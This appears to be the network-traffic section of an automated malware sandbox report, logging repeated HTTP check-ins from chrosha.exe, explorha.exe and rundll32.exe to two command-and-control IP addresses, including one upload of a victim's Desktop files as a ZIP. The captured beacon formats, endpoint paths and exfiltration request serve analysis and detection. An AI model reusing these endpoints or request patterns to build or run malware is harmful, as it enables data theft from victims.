                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:09.398745060 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:09 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      71192.168.2.549892193.233.132.167803844C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:09.223113060 CEST173OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 21
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d
                                                                                                                                                                                                                                      Data Ascii: id=246122658369&cred=
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:09.471394062 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:09 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:12.813725948 CEST169OUTPOST /enigma/index.php?wal=1 HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----NDYyMQ==
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4781
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:12.813757896 CEST140OUTData Raw: 2d 2d 2d 2d 2d 2d 4e 44 59 79 4d 51 3d 3d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36
                                                                                                                                                                                                                                      Data Ascii: ------NDYyMQ==Content-Disposition: form-data; name="data"; filename="246122658369_Desktop.zip"Content-Type: application/octet-stream
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:12.813802004 CEST8OUTData Raw: 50 4b 03 04 14 00 00 00
                                                                                                                                                                                                                                      Data Ascii: PK
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:12.813829899 CEST8OUTData Raw: 08 00 1d 82 44 57 19 a3
                                                                                                                                                                                                                                      Data Ascii: DW
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:12.813857079 CEST8OUTData Raw: 19 73 86 02 00 00 02 04
                                                                                                                                                                                                                                      Data Ascii: s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:12.813868999 CEST8OUTData Raw: 00 00 17 00 00 00 5f 46
                                                                                                                                                                                                                                      Data Ascii: _F
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:12.813894033 CEST8OUTData Raw: 69 6c 65 73 5f 5c 42 4a
                                                                                                                                                                                                                                      Data Ascii: iles_\BJ
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:12.813951015 CEST8OUTData Raw: 5a 46 50 50 57 41 50 54
                                                                                                                                                                                                                                      Data Ascii: ZFPPWAPT
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:12.813951015 CEST8OUTData Raw: 2e 64 6f 63 78 15 93 49
                                                                                                                                                                                                                                      Data Ascii: .docxI
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:12.813968897 CEST8OUTData Raw: 8e 40 21 08 44 f7 9d f4
                                                                                                                                                                                                                                      Data Ascii: @!D
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:12.814203978 CEST8OUTData Raw: a1 10 bf 38 82 f3 74 ff
                                                                                                                                                                                                                                      Data Ascii: 8t
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:13.080621004 CEST190INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:12 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      72192.168.2.549893193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:09.523113012 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:09.771038055 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:09 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:09.791385889 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:10.042619944 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:09 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      73192.168.2.549894193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:09.789484024 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:10.040970087 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:09 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      74192.168.2.549895193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:10.290652990 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:10.539504051 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:10 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      75192.168.2.549896193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:10.396213055 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:10.639931917 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:10 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:10.641870022 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:10.890790939 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:10 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      76192.168.2.549897193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:10.902688026 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:11.152785063 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:11 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      77192.168.2.549899193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:11.243176937 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:11.491249084 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:11 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:11.494462967 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:11.747539043 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:11 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      78192.168.2.549900193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:11.401204109 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:11.647221088 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:11 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      79192.168.2.549903193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:12.026812077 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:12.275314093 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:12 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      80192.168.2.549904193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:12.094748974 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:12.336752892 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:12 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:12.337548971 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:12.584876060 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:12 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      81192.168.2.549905193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:12.524935007 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
